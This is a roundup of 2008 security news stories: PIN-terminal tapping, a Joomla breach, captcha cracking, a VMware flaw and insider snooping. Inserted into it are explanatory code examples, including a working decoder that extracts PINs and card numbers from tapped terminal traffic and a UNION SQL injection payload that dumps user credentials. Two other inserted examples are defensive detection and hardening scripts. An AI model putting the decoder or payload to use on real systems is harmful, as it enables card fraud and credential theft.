Saar Drimer and Steven Murdoch, overseen by Professor Ross Anderson, managed to hack two widely used PIN terminals: the Ingenico i3300 and the Dione Xtreme.

In a research paper seen by ZDNet.co.uk, the researchers outline the hack. Both terminals have tamper-detection mechanisms inside, but both can be circumvented by tapping the serial data line between the PIN entry device and the smartcard. The data exchanged on this line is not encrypted.

The Ingenico i3300 has a tamper-response switch inside which is tripped if the terminal is forced open, and also has its innards wrapped in a tamper-proof mesh, to detect drilling. However, there is a user-accessible compartment to insert SIM cards that is not intended to be tamper-proof. The PCB has various holes that an attacker can use to insert a conductor into the serial data line, to tap both the PIN and card details. The researchers used a paper clip as the conductor, linked to the data line.

The Dione Xtreme also has a tamper-response switch, but no mechanism to detect drilling from the rear. The main keypad and processor are "potted together", making it more difficult to intercept the signal passing between them. However, by drilling a 0.8mm hole from the rear, the researchers inserted a 4cm needle into a flat ribbon connector socket and tapped the data.

In both cases, the conductors were connected to a thin wire connected to a logic board containing a field programmable gate array (FPGA), which translated the data and sent it to a laptop.
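The tapped bytes are only useful once decoded, which is the job the FPGA board and laptop do in the setup described above. The following is an added example, not the Cambridge team's code, showing what that decoding amounts to when, as in many chip-and-PIN deployments, the card verifies the PIN offline in plaintext: the VERIFY command carries the PIN in an EMV format-2 PIN block, and READ RECORD responses carry the PAN and expiry date in BER-TLV. The APDU pairs below are constructed, the ISO 7816 T=0 framing is assumed to have been stripped already, and the instruction and tag constants are the ones defined in ISO 7816 and the EMV specifications.

```python
# Added example (not the Cambridge team's code): decode a plaintext APDU
# exchange tapped from the PED/smartcard data line. Assumes EMV offline
# plaintext PIN verification; the sample bytes below are constructed.
from dataclasses import dataclass
from typing import Dict, Iterable, Optional, Tuple

VERIFY_INS = 0x20        # ISO 7816 VERIFY
READ_RECORD_INS = 0xB2   # ISO 7816 READ RECORD
P2_PLAINTEXT_PIN = 0x80  # EMV: plaintext PIN block, verified by the card
TAG_PAN = 0x5A           # EMV Application PAN
TAG_TRACK2 = 0x57        # EMV Track 2 Equivalent Data


def decode_pin_block(block: bytes) -> str:
    """EMV format-2 PIN block: 0x2N (N = PIN length), then the PIN digits packed
    two per byte, padded with 0xF nibbles to 8 bytes."""
    if len(block) != 8 or block[0] >> 4 != 0x2:
        raise ValueError("not a format-2 PIN block")
    length = block[0] & 0x0F
    if not 4 <= length <= 12:
        raise ValueError("implausible PIN length")
    nibbles = [n for b in block[1:] for n in (b >> 4, b & 0x0F)]
    digits, pad = nibbles[:length], nibbles[length:]
    if any(d > 9 for d in digits) or any(p != 0xF for p in pad):
        raise ValueError("bad PIN digits or padding")
    return "".join(str(d) for d in digits)


def parse_tlv(data: bytes) -> Dict[int, bytes]:
    """Minimal BER-TLV parser; constructed templates (e.g. 0x70) are flattened."""
    out: Dict[int, bytes] = {}
    i = 0
    while i < len(data):
        first = data[i]
        tag = first
        i += 1
        if first & 0x1F == 0x1F:            # two-byte tag
            tag = (tag << 8) | data[i]
            i += 1
        length = data[i]
        i += 1
        if length & 0x80:                   # long-form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if first & 0x20:                    # constructed: recurse
            out.update(parse_tlv(value))
        else:
            out[tag] = value
    return out


@dataclass
class Capture:
    pin: Optional[str] = None
    pan: Optional[str] = None
    expiry: Optional[str] = None


def decode_exchange(pairs: Iterable[Tuple[bytes, bytes]]) -> Capture:
    """pairs: (command APDU, response APDU) as seen on the data line."""
    cap = Capture()
    for cmd, rsp in pairs:
        ins, p2 = cmd[1], cmd[3]
        if ins == VERIFY_INS and p2 == P2_PLAINTEXT_PIN:
            lc = cmd[4]
            cap.pin = decode_pin_block(cmd[5:5 + lc])
        elif ins == READ_RECORD_INS and rsp[-2:] == b"\x90\x00":
            tlv = parse_tlv(rsp[:-2])
            if TAG_TRACK2 in tlv:
                t2 = tlv[TAG_TRACK2].hex().upper().rstrip("F")
                pan, _, rest = t2.partition("D")   # 'D' separates PAN and expiry
                cap.pan, cap.expiry = pan, rest[:4]
            elif TAG_PAN in tlv and cap.pan is None:
                cap.pan = tlv[TAG_PAN].hex().upper().rstrip("F")
    return cap


# Constructed capture: one READ RECORD returning a 0x70 template with Track 2
# data, then a VERIFY carrying PIN 1234 in the clear.
SAMPLE_EXCHANGE = [
    (bytes.fromhex("00B2010C00"),
     bytes.fromhex("7013" "5711" "4111111111111111D1212101000000000F" "9000")),
    (bytes.fromhex("0020008008" "241234FFFFFFFFFF"), bytes.fromhex("9000")),
]

if __name__ == "__main__":
    print(decode_exchange(SAMPLE_EXCHANGE))
```

If the card and terminal instead use enciphered offline PIN (P2 0x88), the VERIFY payload is RSA-encrypted under the card's key and this decoder sees only ciphertext; the PAN and expiry in the READ RECORD responses are still in the clear either way, which is why the tap yields card details regardless of the PIN method.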

Both devices were Visa-certified, a standard that requires that defeating the tamper detection cost more than $25,000 (£12,500) per PIN entry device, or that inserting a PIN-stealing bug either be detected or take more than 10 hours.

Neither terminal meets any of these requirements, the research paper said.

"What should have required $25,000 needed just a bent paperclip, a needle, a short length of wire and some creative thinking; attaching them to the data line takes minutes with some practice," said the paper.

"What this shows is that PIN entry devices in the UK are very insecure," said Professor Anderson about the research. "What's more, the [device] certification process is completely defective. Certified devices are easy to breach. That's bad news for retailers, and bad news for customers."

Drimer added that this hack showed the complete process from design to implementation of these devices was broken.

"These devices should not have been certified because they clearly fail the criteria under which they were evaluated," Drimer told ZDNet.co.uk. "Something went wrong in the design of these devices, the certification process, and the EMV implementation choices made by the banks."

Ingenico admitted that the hack was successful, but said that its device "still remained one of the safest on the market".

A spokesman for Ingenico Northern Europe said: "Retailers and card users should rest assured that the devices, from various suppliers, identified by the Cambridge University scientists, remain among the most secure terminals on the market and have contributed to card fraud at UK retailers falling by up to 47 percent year-on-year since the introduction of chip and PIN. The banking industry has already expressed its confidence in the security capabilities of all chip and PIN payment devices being used in the UK today.

"The method identified by the Cambridge University paper requires specialist knowledge and has inherent technical difficulties. This method is therefore not reproducible on a large scale, nor does it take into account the fraud monitoring used throughout the industry."

"Security remains a top priority for Ingenico and we invest around €40m each year in research and development to ensure our customers remain at the forefront of the fight against fraud."

"This investment is highlighted in the latest generation of our terminals which are approved under the latest security standards. These meet the higher security required by industry mandates introduced on 1 January, 2008 and are designed to stay one step ahead of the evolving security threat."

Dione, which is manufactured by Verifone, had not responded to a request for comment at the time of writing.

Judge accuses hacks of hacking cannibal ruling

A state judge in Oklahoma has publicly accused reporters covering a high-profile murder trial of hacking into her computer and stealing a secret ruling she issued in the case.

Cleveland County District Judge Candace Blalock made the allegations after a local TV station reported that portions of a confession police obtained from the defendant could be presented at trial. For reasons that still aren't clear, Blalock, who is presiding over the trial, emailed a copy of the confidential ruling to her home computer. Shortly after that, KWTV-9 News reported the decision.

"I don't doubt that they hired people to hack into the computers," she said, according to this news account. "That's what I think happened, and I think that because I do not believe any of the lawyers involved here would violate" the confidentiality order.

Officials at the television station didn't return a call seeking comment.

The accusation came in the trial of 28-year-old Kevin Underwood, who is being tried for the cannibalistic killing of a 10-year-old neighbor. Given the extreme intrigue created by the case, Blalock said, she believes reporters took extraordinary measures to obtain the ruling.

"I am suspecting that I may have caused a problem myself," she said, by "titillating" the news media with information about a ruling that was not obtainable.

Harvard Hack Betrays Joomla! Vulnerabilities?

A Harvard Website was hacked recently, with 125 MB of records stolen and later uploaded to BitTorrent for Peer-to-Peer distribution. gsas.harvard.edu was still down at the time this article was researched (it’s back up now).

The site was a local Joomla installation. A variety of simple Joomla! hacks have been identified and shared around the web in recent weeks. Most of these claimed vulnerabilities exploit weaknesses in third-party components, exposing SQL injection flaws. It is not yet clear whether the Harvard Grad. School of Arts and Sciences site fell victim to such an attack.

According to Calum McLeod of protection experts Cyber-Ark “the Harvard University hack apparently involves the complete site database — allegedly including hidden system files. If the University had used a data encryption system on its most sensitive files, then this systematic site hack would probably not have occurred.”

Although the methods employed by the hacker are not yet known, one popular hackers' board lists exploits for no fewer than 14 Joomla! components (url on request), all of which have appeared since the beginning of this month (Feb 2008). Popular extensions cited as vulnerable include Galeria, Quiz, NeoGallery and a range of com_ components. All the listed vulnerabilities were SQL injection strings or remote SQL injection attack methods.
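The pattern behind those component advisories is the same every time: a request parameter is pasted into the SQL text, and a UNION in that parameter makes the component render rows from a table it was never meant to read. The following is an added example, not Joomla code and not any of the published exploits, that shows the flaw and its fix against an in-memory SQLite stand-in for the Joomla database. Table names use Joomla's default jos_ prefix; the rows and the hash value are constructed.

```python
# Added example (not Joomla code): the SQL injection pattern behind the
# component advisories, and the fix, against an in-memory SQLite stand-in.
# Tables use Joomla's default jos_ prefix; rows are constructed.
import sqlite3
from typing import List, Tuple


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE jos_gallery (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
        CREATE TABLE jos_users   (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO jos_gallery VALUES (1, 'Campus', 1), (2, 'Commencement', 0);
        INSERT INTO jos_users   VALUES (62, 'admin', 'c0ffee...:s4lt');
    """)
    return con


def gallery_vulnerable(con: sqlite3.Connection, gallery_id: str) -> List[Tuple]:
    """The flawed pattern: the request parameter goes straight into the SQL text
    (in PHP: "... WHERE id = " . $_GET['id'])."""
    sql = "SELECT title, published FROM jos_gallery WHERE id = " + gallery_id
    return con.execute(sql).fetchall()


def gallery_fixed(con: sqlite3.Connection, gallery_id: str) -> List[Tuple]:
    """Validate the type first, then bind. Non-numeric input never reaches the DB."""
    try:
        gid = int(gallery_id)
    except ValueError as e:
        raise ValueError("gallery id must be an integer") from e
    return con.execute(
        "SELECT title, published FROM jos_gallery WHERE id = ?", (gid,)
    ).fetchall()


# What the published exploit strings do: a UNION that appends rows from another
# table to the component's own result set, so the page renders them.
PAYLOAD = "1 UNION SELECT username, password FROM jos_users"


def exposes_credentials(rows: List[Tuple]) -> bool:
    """True if a user row leaked into what should be gallery rows."""
    return any(r[0] == "admin" for r in rows)


if __name__ == "__main__":
    con = build_db()
    print("vulnerable:", gallery_vulnerable(con, PAYLOAD))
    print("fixed     :", gallery_fixed(con, "1"))
```

In a Joomla 1.5 component the equivalent fix is to fetch the parameter as an integer (JRequest::getInt) or cast it with (int) before it touches the query; string parameters need the database layer's quoting or bound parameters rather than concatenation.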

RFID Reader to Locate Passive Tags To Within Six Inches

Sunnyvale startup Wirama has announced the most precise RFID reader yet, able to locate passive EPC Class 1 Gen 2 tags to within 6 inches. Until now, locating a tag that precisely required the most expensive readers, or tags carrying their own (wasteful) batteries. Cheaper precise tracking lowers the cost of entry for RFID inventory systems, which could displace barcodes and let small businesses save money by keeping precise, real-time track of their wares.

As long as it doesn't lead to a crunchy, RFID-filled strawberry that will stick to the insides of my stomach, remotely track my whereabouts throughout the world, and lead to a vast history bank sorting my directional choices like a lab rat, it seems like a cool breakthrough.

At the moment, the reader's range for these passive tags is about 15 feet, long enough for your own version of Michael Scott to read your emails and know when you're going to the bathroom too much.

A couple of months ago, Rob Beschizza talked about the use of short-range-capable RFID badges to track attendees at CES 2008 and decided he was fine with it.

Spammers crack Gmail Captcha

Spammers, fresh from the success of cracking the Windows Live captcha used by Hotmail, have broken the equivalent system at Gmail.

Internet security firm Websense reports that miscreants have created bots which are capable of signing up and creating random Gmail accounts for spamming purposes, defeating Captcha-based defences in the process. It reckons the same group of spammers are behind both attacks.

Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) challenge-response systems, which are used to prevent accounts being created until a user correctly identifies letters in an image, are designed to ensure requests are made by a human rather than an automated program. Services including Yahoo! Mail and Gmail have used the technique for years to defeat automated sign-ups, and hackers are increasingly successful in defeating the approach. For example, the HotLan Trojan has created more than 500,000 spam email accounts with Hotmail, Yahoo! and Gmail since its arrival back in July 2007.

Websense reckons the latest Gmail Captcha hack is the most sophisticated it has seen to date. Unlike Live Mail Captcha breaking, which involved just one zombie host doing the entire job, the Gmail breaking process involves two compromised hosts. Each of the two compromised hosts applies a slightly different technique to analysing Captcha, as explained in a posting by Websense.

Even using the two techniques, only one in every five Captcha-breaking requests is successful. It's a fairly low percentage, but still more than workable for an automated attack.

It sounds like a lot of effort, but gaining a working Gmail account has a number of advantages for spammers. As well as gaining access to Google's services in general, spammers gain an address whose domain is highly unlikely to be blacklisted, helping them defeat one aspect of anti-spam defences. Gmail also has the benefit of being free to use.

A wide range of Captcha-breaking services are hosted on a domain located in the US, Websense reports. The page includes a support page and payment advice along with an internal test page.

Stay safe while using Microsoft Office 2003

You trust Microsoft Office with your most important documents, spreadsheets, e-mail, and presentations. Unfortunately, many of the default security settings in Office applications may not provide a sufficient level of protection for your data, your system, and your reputation. Follow these steps to fine-tune the security settings in Office 2003; tomorrow I'll cover the new security options in Office 2007's Trust Center and elsewhere.

Office 2003 offers two different kinds of protection, and it pays to keep them apart. Tools > Options > Security (Password to open, with the Advanced button choosing the encryption type) is what actually encrypts a file so that a password is needed to read it. The Protect Document feature described next only restricts editing; it does not encrypt the contents, and a determined recipient can strip it. In Word 2003, open the document and click Tools > Protect Document. To restrict the styles that can be applied to the file, check Limit formatting to a selection of styles, and click Settings. Uncheck the styles you don't want to allow, or choose one of the other style-restriction options, and click OK. To make the document read-only, check Allow only this type of editing in the document, and select one of the options in the drop-down menu: Tracked changes, Comments, Filling in forms, or No changes (Read only).

Microsoft Word 2003's Protect Document dialog box

Choose an option in Word 2003's Protect Document dialog box to restrict access to the document.

You can also designate the people who can access the file by clicking More users, entering their user names or e-mail addresses, and clicking OK. When you're done, click Yes, Start Enforcing Protection. In the resulting dialog box, either choose Password and enter twice the password that will remove the protection, or select User authentication, which allows only the people you designate to remove it.

The User authentication option requires Microsoft's Information Rights Management, which requires the Windows Rights Management client. This in turn requires a .NET Passport account, and your agreement to the "free trial," though there's no indication if or when the trial will end. Microsoft promises to maintain the privacy of your files, and to make them available for three months after the trial ends, if you maintain the .NET Passport account. There may be a good reason to go this route, but to keep things simple, I stick with the password option. To remove these settings, click Tools > Unprotect Document, and enter the password (if you chose this method of protection).

Microsoft Word 2003's Protection method dialog box

Choose Password and enter the password that will remove the protection, or select User authentication to allow the people you designate to read, edit, and/or comment on the document.

To protect a worksheet or file in Excel 2003, click Tools > Protection, and choose your preferred protection method: Protect Sheet, Allow Users to Edit Ranges, Protect Workbook, or Protect and Share Workbook. If you choose the first option, you're prompted to enter a password to unlock the sheet, and you can limit the actions people can take when working on the sheet. The second selection opens a dialog box in which you can specify the ranges that will be unlocked by a password by clicking New and entering the ranges. You can allow specific people to edit, or list the users who can't edit the range without a password by clicking Permissions and entering their user or group names. The third and fourth options are similar to the first, but apply to the entire workbook rather than a specific worksheet.

In PowerPoint 2003, click Tools > Options > Security, enter a password that will let the presentation be opened or modified, and click the Advanced button to select an encryption type. This dialog box also lets you remove hidden data from the file, and adjust your macro security settings (the default allows only signed macros from trusted sources, though this is of questionable value since "trusted sources" is pretty meaningless).

Outlook 2003's security options let you encrypt outgoing attachments, restrict the sites that can send you scripts and active content (the same list that's in your Internet Options), and limit the receipt of images and file downloads. But two of the most important things you can do to protect yourself from malware in Outlook are to turn off the Reading Pane (aka Preview Pane), and to view your mail as plain text. To deactivate the Reading Pane, click View > Reading Pane > Off. And to switch from HTML mail to the safer plain text, click Tools > Options > E-mail Options, check Read all standard mail in plain text, and click OK. When you want to view a message in its original HTML format, click the beige message bar across the top of the message window and select Display as HTML.

Microsoft Outlook 2003's E-mail Options dialog box

Protect yourself from malicious messages in Outlook 2003 by selecting "Read all standard mail in plain text" in the program's E-mail Options.

Protect your reputation with the Remove Hidden Data tool: Maybe you're one of the many Office users who have suffered the embarrassment of sending someone (or a lot of someones) a file that hadn't had its revisions and comments deleted. To minimize the chances of the public seeing more of your files than you intend, download Microsoft's free Remove Hidden Data tool. (I described this program and four other great Office freebies in an earlier post.)

Scotland Yard careers website defaced

Unknown hackers defaced the Metropolitan Police's careers website over the weekend.

Digital graffiti on metpolicecareers.co.uk featured a picture of a greenish cuddly monster (vaguely resembling Sulley from Monsters Inc) and a message mocking Scotland Yard's anti-terrorism unit.

Court case reveals workers regularly snoop

A lawsuit filed by a woman fired from Wisconsin's largest electric utility for accessing sensitive records has revealed that employees frequently accessed sensitive customer information for their own gain, according to an article published by the Associated Press on Saturday.

Underscoring companies' lax oversight of their workers' access to customers' personal information, the case has revealed that employees at Milwaukee-based WE Energies regularly accessed records that included credit and banking information, payment histories, addresses and phone numbers, and Social Security numbers, according to the media report. Examples included a woman who often perused information on an ex-boyfriend, a woman who searched for the address of her child's father, and a part-time landlord who investigated prospective tenants. Another worker leaked information on a mayoral candidate's habit of paying heating bills late, possibly affecting the election, the article said.

"People were looking at an incredible number of accounts," Joan Shafer, WE Energies' vice president of customer service, said during a sworn deposition last year, according to the AP report. "Politicians, community leaders, board members, officers, family, friends. All over the place."

While privacy experts have worried about the large number of data breaches reported in the past two years, reports are increasingly coming to light of corporate employees and government workers using their positions of trust to access personal information. Earlier this month, a police officer in Dekalb County, Georgia, was suspended for five weeks for using a classified law-enforcement system to send fliers to the family and friends of a woman dating her husband, from whom she had separated. The fliers had a picture of the woman, the word "Homewrecker" written across the top and verses from the Bible on adultery. Last year, the Internal Revenue Service leveled more than 200 disciplinary actions against federal employees for illicitly accessing the financial information of private citizens, according to an Inspector General report cited by the Associated Press.

While insider threats to corporate data have garnered a great deal of attention, the privacy impact of workers in privileged positions has received less attention.
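None of the lookups in the WE Energies account would have tripped a perimeter control: these were authorised users reading records they were permitted to read. What catches them is review of the access audit trail. The following is an added example, not anything from the AP report or the utility, that runs three such checks over a constructed customer-record access log: lookups with no ticket or case behind them, an employee whose count of distinct accounts viewed is far above peers, and any access to accounts on a watch list (public figures, board members, staff). The thresholds, log format and watch list are assumptions.

```python
# Added example (not from the AP report or WE Energies): detection pass over a
# constructed customer-record access log. Thresholds are assumptions.
import csv
import io
from collections import defaultdict
from statistics import median
from typing import Dict, List

SAMPLE_LOG = """timestamp,employee,account_id,ticket_id
2008-02-25T09:01:00,jdoe,100231,T-5531
2008-02-25T09:05:00,jdoe,100877,T-5532
2008-02-25T09:40:00,jdoe,100902,T-5540
2008-02-25T10:11:00,asmith,200010,T-5533
2008-02-25T10:12:00,asmith,200011,
2008-02-25T10:13:00,asmith,200012,
2008-02-25T10:14:00,asmith,200013,
2008-02-25T10:15:00,asmith,200014,
2008-02-25T10:16:00,asmith,200015,
2008-02-25T10:17:00,asmith,200016,
2008-02-25T10:18:00,asmith,200017,
2008-02-25T10:19:00,asmith,200018,
2008-02-25T10:20:00,asmith,200019,
2008-02-25T12:00:00,bjones,300500,T-5560
2008-02-25T12:30:00,bjones,300501,T-5561
2008-02-25T12:31:00,bjones,900001,T-5561
"""

WATCHLIST = {"900001": "mayoral candidate"}   # constructed


def parse_log(text: str) -> List[Dict[str, str]]:
    return list(csv.DictReader(io.StringIO(text)))


def detect(rows: List[Dict[str, str]], watchlist: Dict[str, str],
           volume_ratio: float = 3.0, min_unjustified: int = 3) -> List[Dict]:
    """Three rules: watch-list access (flagged even with a ticket), distinct-account
    volume >= volume_ratio x the median employee, and >= min_unjustified lookups
    carrying no ticket/case reference."""
    accounts = defaultdict(set)      # employee -> distinct accounts viewed
    unjustified = defaultdict(list)  # employee -> accounts viewed with no ticket
    findings: List[Dict] = []
    for r in rows:
        emp, acct = r["employee"], r["account_id"]
        accounts[emp].add(acct)
        if not r["ticket_id"].strip():
            unjustified[emp].append(acct)
        if acct in watchlist:
            findings.append({"rule": "watchlist", "employee": emp, "account": acct,
                             "detail": watchlist[acct], "ticket": r["ticket_id"]})
    baseline = median(len(s) for s in accounts.values())
    for emp, accts in accounts.items():
        if len(accts) >= volume_ratio * baseline:
            findings.append({"rule": "volume", "employee": emp,
                             "count": len(accts), "baseline": baseline})
    for emp, accts in unjustified.items():
        if len(accts) >= min_unjustified:
            findings.append({"rule": "no_ticket", "employee": emp,
                             "count": len(accts), "accounts": accts})
    return findings


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG), WATCHLIST):
        print(f)
```

The watch-list rule fires even when a ticket is attached, because a ticket number is easy to borrow; in practice the watch list should include the employees' own accounts and those of their relatives, since self-lookup and family lookups are the commonest abuses. The volume rule uses the median across employees rather than a fixed number so that a busy call centre and a small billing team get sensible baselines from the same code.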

VMware Software Vulnerability Discovered

Core Security Technologies, based in Boston, Mass., announced the discovery of a flaw in VMware's desktop virtualization software for Windows that could leave companies vulnerable to hackers. The company discovered that a malicious user or software running on a guest system within VMware's desktop software could break out of the isolated environment and gain full access to the host computer system.

"What's most relevant about this vulnerability is it demonstrates how virtual environments can provide an open door to the underlying infrastructures that host them," said Core Security's CTO Iván Arce. He said organizations often adopt virtualization technologies with the assumption that the isolation between the host and guest systems will improve their security posture, but this discovery acts as a "wake-up call" for IT managers.

"It signals that virtualization is not immune to security flaws and that 'real' environments aren't safe simply because they sit behind virtual environments," he said.

CoreLabs, the research center of Core Security Technologies, found that the vulnerability affects VMware Workstation, Player and ACE software and that it is only exploitable when shared folders are enabled and at least one folder on the host system is configured for sharing. The announcement comes on the eve of VMware's first annual VMworld Europe conference.

VMware acknowledged the flaw and has told users to disable shared folders, and said the vulnerability isn't present in its server line because VMware Server and ESX Server do not use shared folders. Core Security also recommended disabling shared folders, or, if the shared folders feature is required, reconfiguring it for read-only access.

This is the second security alert in as many weeks for the Palo Alto-based company. On February 22 VMware issued patches to fix vulnerabilities in its ESX Server, which could allow hackers to circumvent security controls and view sensitive information.
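Both pieces of advice above come down to a few lines in the virtual machine's .vmx file, which makes them easy to audit across a fleet of desktop VMs. The script below is an added example, not VMware's tooling: it parses a .vmx, reports each enabled share and whether the guest can write to it, and produces the hardened configuration either way (feature disabled, or shares kept but made read-only). The sharedFolderN.* and isolation.tools.hgfs.disable keys are the ones VMware Workstation writes for this feature; treat the exact key names as an assumption and check them against a .vmx of your own before relying on the audit. The fragment is constructed.

```python
# Added example (not VMware's tooling): audit a VMware Workstation/Player .vmx
# for enabled shared folders and emit the hardened settings. Key names
# (sharedFolderN.*, isolation.tools.hgfs.disable) are assumed; the sample
# fragment is constructed.
import re
from typing import Dict, List, Tuple

SAMPLE_VMX = r'''.encoding = "UTF-8"
config.version = "8"
displayName = "win-guest"
sharedFolder.maxNum = "2"
sharedFolder0.present = "TRUE"
sharedFolder0.enabled = "TRUE"
sharedFolder0.readAccess = "TRUE"
sharedFolder0.writeAccess = "TRUE"
sharedFolder0.hostPath = "C:\Users\me\Documents"
sharedFolder0.guestName = "Documents"
sharedFolder1.present = "TRUE"
sharedFolder1.enabled = "TRUE"
sharedFolder1.readAccess = "TRUE"
sharedFolder1.writeAccess = "FALSE"
sharedFolder1.hostPath = "C:\iso"
sharedFolder1.guestName = "iso"
'''

VMX_LINE = re.compile(r'^\s*([\w.]+)\s*=\s*"(.*)"\s*$')
SHARE_KEY = re.compile(r"^sharedFolder(\d+)\.(\w+)$")


def parse_vmx(text: str) -> Dict[str, str]:
    """key = "value" lines into a dict; anything else (comments, blanks) is skipped."""
    cfg: Dict[str, str] = {}
    for line in text.splitlines():
        m = VMX_LINE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def render_vmx(cfg: Dict[str, str]) -> str:
    return "".join(f'{k} = "{v}"\n' for k, v in cfg.items())


def _is_true(cfg: Dict[str, str], key: str) -> bool:
    return cfg.get(key, "FALSE").upper() == "TRUE"


def shared_folders(cfg: Dict[str, str]) -> Dict[int, Dict[str, str]]:
    """Group sharedFolderN.<attr> keys by N."""
    shares: Dict[int, Dict[str, str]] = {}
    for k, v in cfg.items():
        m = SHARE_KEY.match(k)
        if m:
            shares.setdefault(int(m.group(1)), {})[m.group(2)] = v
    return shares


def audit(cfg: Dict[str, str]) -> List[Tuple[str, str]]:
    """Findings: ('hgfs_off'|'writable_share'|'readonly_share'|'no_shares', detail)."""
    if _is_true(cfg, "isolation.tools.hgfs.disable"):
        return [("hgfs_off", "shared folders unreachable from the guest")]
    findings = []
    for n, s in sorted(shared_folders(cfg).items()):
        if not (s.get("present", "").upper() == "TRUE"
                and s.get("enabled", "").upper() == "TRUE"):
            continue
        kind = ("writable_share" if s.get("writeAccess", "").upper() == "TRUE"
                else "readonly_share")
        findings.append((kind, f"sharedFolder{n}: {s.get('hostPath')} -> {s.get('guestName')}"))
    return findings or [("no_shares", "no enabled shared folders")]


def harden(cfg: Dict[str, str], keep_readonly: bool = False) -> Dict[str, str]:
    """Hardened copy. Default: disable the feature entirely (VMware's and Core's
    first recommendation). keep_readonly=True: keep shares, strip write access."""
    out = dict(cfg)
    for n in shared_folders(cfg):
        if keep_readonly:
            out[f"sharedFolder{n}.writeAccess"] = "FALSE"
        else:
            out[f"sharedFolder{n}.enabled"] = "FALSE"
    if not keep_readonly:
        out["isolation.tools.hgfs.disable"] = "TRUE"
    return out


if __name__ == "__main__":
    cfg = parse_vmx(SAMPLE_VMX)
    print(audit(cfg))
    print(render_vmx(harden(cfg)))
```

Read-only sharing narrows the exposure rather than removing it: the guest can still read everything under the shared host path, so the path itself matters as much as the write flag.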

Lack of jobs is driving IT pros to malware

The growing number of cyber criminals in parts of Asia and Eastern Europe is the result of a lack of IT jobs for qualified professionals, according to a report from vendor McAfee.

And the growing trade in malware means that authors can sell their code to other criminals without actually releasing their viruses.

Writing malware is a hard option to ignore, according to Joe Telafici, vice president of operations at McAfee.

"The motivation to engage in illegal behavior is strong in Eastern Europe where technical skills were widely taught during the Cold War but economic opportunities are limited," he said.

"The same is true in Asia, where population growth has stretched strong economic performance to the limits."

In China, 43 per cent of IT graduates are unemployed, and hacker "training" web sites are creating a pool of effective malware authors and paying them like a legitimate business.

In September last year, Chinese courts sentenced malware author Li Jun, 25, to four years in prison.

Li Jun had graduated from an IT training college and earned three times China's average salary writing malware, despite being offered legitimate positions in the business world.

Pakistan's Censors Target YouTube, Trigger Brief World-Wide Outage

Service on Google Inc.'s YouTube site was disrupted around the world for several hours Sunday after a botched effort by the Pakistan government to block access to a video clip critical of Islam.

The incident, which is still being investigated by YouTube, underscores the vulnerability of the global communications infrastructure. The unusual circumstances surrounding the breakdown also point to the growing role sites like YouTube have played in spreading politically charged content -- including in Pakistan, a nation that is already a tinderbox of political tensions.

The story began unfolding Friday when the Pakistan Telecommunications Authority, the nation's telecom regulator, ...

How much does a data breach cost UK companies?

Data breaches cost UK companies an average of £47 for every record lost.

This means the average cost to a company which suffers a data breach is £1.4m. The Ponemon Institute isn't pulling these figures out of the ether - it talked to 21 UK companies about how much actual data breaches cost them.

From a total of £47 per record, the cost from lost business in the wake of a data disaster is 36 per cent or £17. Financial services companies are particularly at risk - their average costs per record are £55. Customer expectations of trust mean they also suffer a higher cost of lost business.

Phillip Dunkelberger, CEO at PGP Corporation, told The Reg: "Companies are increasingly waking up to the real cost of data losses, especially the cost of losing customers. It is a serious global problem with no easy answers."

Both PGP and Symantec, who co-sponsored the study, believe some kind of data notification law - where companies are obliged to tell a third party when a breach occurs - could help.

Ponemon estimates customer churn rates to go up by an average of 2.5 per cent after a data loss, but the worst example in the UK saw churn rates go up by seven per cent.

The size of the losses examined ranged from 2,500 records to more than 125,000 and costs ranged from £84,000 to £3.8m.

Breaches by third parties were more expensive than in-house losses - on average £59 rather than £42 in-house. This is a difficult issue for big companies to deal with, because their supply chain will include hundreds or even thousands of partner and outsourcer companies.

Japan Launches Internet Satellite

An H-2A rocket lifts off from its launch pad on the island of Tanegashima on Saturday February 23, 2008. Japan's space agency said Saturday it launched a communications satellite designed to enable super high-speed data transmission. The H-2A rocket carrying the satellite lifted off from the southern island of Tanegashima at 5:55 p.m. (0855 GMT), according to a live Internet broadcast by the Japan Aerospace Exploration Agency. (AP Photo/Kyodo News)

(AP) -- Japan's space agency launched an experimental communications satellite Saturday designed to enable super high-speed data transmission at home and in Southeast Asia.

The domestically developed H-2A rocket carrying the satellite, "Kizuna," was launched Saturday evening from the southern island of Tanegashima, according to a live Internet broadcast by the Japan Aerospace Exploration Agency, known as JAXA.

The satellite, equipped with two large multi-beam antennas, separated from the rocket and successfully entered its intended orbit 175 miles from Earth, JAXA said in a statement.

The agency said it hoped to enable data transmission of up to 1.2 gigabits per second at a low cost across Japan and in 19 different places in Southeast Asia. JAXA developed Kizuna with another government agency, the National Institute of Information and Communications Technology, and Mitsubishi Heavy Industries, Ltd.

The cost of the satellite's development, launch and operation is estimated at $480 million, JAXA spokeswoman Asaka Hagiwara said.

Japan has yet to join the lucrative international satellite market, and Kizuna, which should be in operation for five years, is not intended for commercial use. Its large H-2A rocket is one of the most advanced and reliable in the world - Saturday's was its eighth straight successful launch.

Nato's one click ahead of a cyberspace threat

Mr Samuel, 35, is a "whitehat" - a "benign" hacker employed to break into the computer systems of governments and businesses to show their weaknesses. To the horror of his clients, it is a task he performs far too easily. Had he not been so busy last week, he was willing to demonstrate techniques to obtain the PINs and passwords to a Sunday Telegraph reporter's HSBC bank account. In England a while back he showed finance experts how to hack into the Bank of England website.

But altogether rather scarier was the stunt he pulled a few weeks ago, when he hacked into the computer system of a European airport (he declines to say which), posting a cartoon film on a television screen in the public lobby for ten minutes. For him, the purpose was to show the airport how easily its supposedly secure computer systems could be compromised. But for a less benevolent hacker, he says, it could have paved the way for a "cyberterrorism" attack.

"If you can hack into an airport you can manage anything," said Mr Samuel. "Even just putting a different message on the monitors could have been dangerous - you could have told people there was a bomb about to go off, which would have forced them to shut down the airport for a whole day."

Until now, such nightmare scenarios have largely been a concern only for the likes of Bruce Willis in Die Hard IV, in which an attack on America's internet systems threatens to crash the country's stockmarket and power networks. Yet in Estonia, it is no longer the stuff of Hollywood but a reality.

